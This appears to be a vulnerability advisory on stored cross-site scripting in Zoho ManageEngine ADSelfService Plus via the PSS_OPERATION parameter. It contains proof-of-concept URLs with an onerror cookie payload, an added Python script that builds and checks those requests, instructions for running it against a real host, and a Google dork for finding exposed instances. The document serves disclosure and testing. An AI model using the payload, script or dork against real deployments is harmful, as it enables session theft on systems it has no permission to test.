RestAPI/PasswordSelfServiceAPI in Zoho ManageEngine ADSelfService Plus build 5707 and below allows remote attackers to inject arbitrary web script or HTML via the PSS_OPERATION parameter. The value supplied with operation=verifyUser is stored server-side and later written unescaped into the response for operation=passwordSelfService, so this is a stored (persistent) cross-site scripting issue rather than a reflected one.
Example Proof of Concept:
Stored XSS payload (step 1: the request that stores the payload; the PSS_OPERATION value decodes to "};<html><IMG SRC=/ onerror=alert(document.cookie)></img>):
https://example.com/RestAPI/PasswordSelfServiceAPI?operation=verifyUser&PRODUCT_NAME=ADSSP&PSS_OPERATION=%22%7D%3B%3Chtml%3E%3CIMG%20SRC=/%20onerror=alert(document.cookie)%3E%3C/img%3E
Payload execution (step 2: visiting this URL renders the stored value, and the onerror handler fires in the visitor's session):
https://example.com/RestAPI/PasswordSelfServiceAPI?operation=passwordSelfService&PRODUCT_NAME=ADSSP
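The two-step flow above, as an added example for reproducing the check offline. This is not code from Zoho or from the advisory's author: the URL builders reproduce the advisory's PoC URLs byte for byte, while the FakeADSSP class, its response bodies and the verify() flow are constructed assumptions about how a vulnerable build and a fixed build would answer, used only so the script runs without a target.

```python
"""Offline reproduction of the ADSelfService Plus PSS_OPERATION stored-XSS check.

Added example, not part of the original advisory. The fake server below is a
constructed stand-in for the product, not its real behaviour.
"""
import html
import re
from urllib.parse import parse_qs, quote, urlparse

API_PATH = "/RestAPI/PasswordSelfServiceAPI"

# Payload from the advisory: closes a quoted JSON-style string, then injects
# an <IMG> whose onerror handler executes script in the victim's session.
PAYLOAD = '"};<html><IMG SRC=/ onerror=alert(document.cookie)></img>'


def build_store_url(base: str) -> str:
    """Step 1 of the PoC: store the payload via operation=verifyUser."""
    # safe="/=()" reproduces the percent-encoding used in the advisory's URL.
    return (f"{base}{API_PATH}?operation=verifyUser&PRODUCT_NAME=ADSSP"
            f"&PSS_OPERATION={quote(PAYLOAD, safe='/=()')}")


def build_trigger_url(base: str) -> str:
    """Step 2 of the PoC: the request whose response renders the stored value."""
    return f"{base}{API_PATH}?operation=passwordSelfService&PRODUCT_NAME=ADSSP"


# Matches a live <img ... onerror=...> tag; an HTML-encoded copy (&lt;IMG ...)
# does not match because the leading '<' is gone.
_RAW_IMG_ONERROR = re.compile(r"<img\b[^>]*\bonerror\s*=", re.IGNORECASE)


def is_exploitable_reflection(content_type: str, body: str) -> bool:
    """Heuristic: the handler survives as raw markup in a response the browser
    will render as HTML. A JSON response or an escaped copy does not count;
    final confirmation is still the alert() firing in a browser."""
    if not content_type.lower().startswith("text/html"):
        return False
    return bool(_RAW_IMG_ONERROR.search(body))


def verify(base: str, fetch) -> bool:
    """Run both PoC steps through fetch(url) -> (content_type, body) and
    report whether the stored payload comes back as live markup."""
    fetch(build_store_url(base))            # step 1: store
    content_type, body = fetch(build_trigger_url(base))  # step 2: trigger
    return is_exploitable_reflection(content_type, body)


class FakeADSSP:
    """Constructed stand-in for the target (hypothetical, not product code).
    escape=False mimics the reported bug: the stored value is pasted raw into
    the HTML returned for the trigger URL. escape=True is the fixed shape."""

    def __init__(self, escape: bool):
        self.escape = escape
        self.stored = ""

    def fetch(self, url: str):
        query = parse_qs(urlparse(url).query)
        op = query.get("operation", [""])[0]
        if op == "verifyUser":
            self.stored = query.get("PSS_OPERATION", [""])[0]
            return "application/json", '{"status":"ok"}'
        if op == "passwordSelfService":
            value = html.escape(self.stored) if self.escape else self.stored
            # The '"};' prefix of the payload closes this pseudo-JSON string so
            # the <IMG> that follows lands in HTML context.
            page = f'<html><body><div>{{"PSS_OPERATION":"{value}"}}</div></body></html>'
            return "text/html", page
        return "text/html", "<html><body>unknown operation</body></html>"


if __name__ == "__main__":
    for fixed in (False, True):
        result = verify("https://example.com", FakeADSSP(escape=fixed).fetch)
        print(f"escape={fixed}: exploitable reflection = {result}")
```

Against a real host, replace FakeADSSP(...).fetch with a function that performs the two GETs (for example with requests, keeping a session so the stored value is tied to the same client) and returns the Content-Type header and body; a positive result means the handler text reached the page unencoded, which you then confirm in a browser.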
Google Dork:
inurl:"showlogin.cc"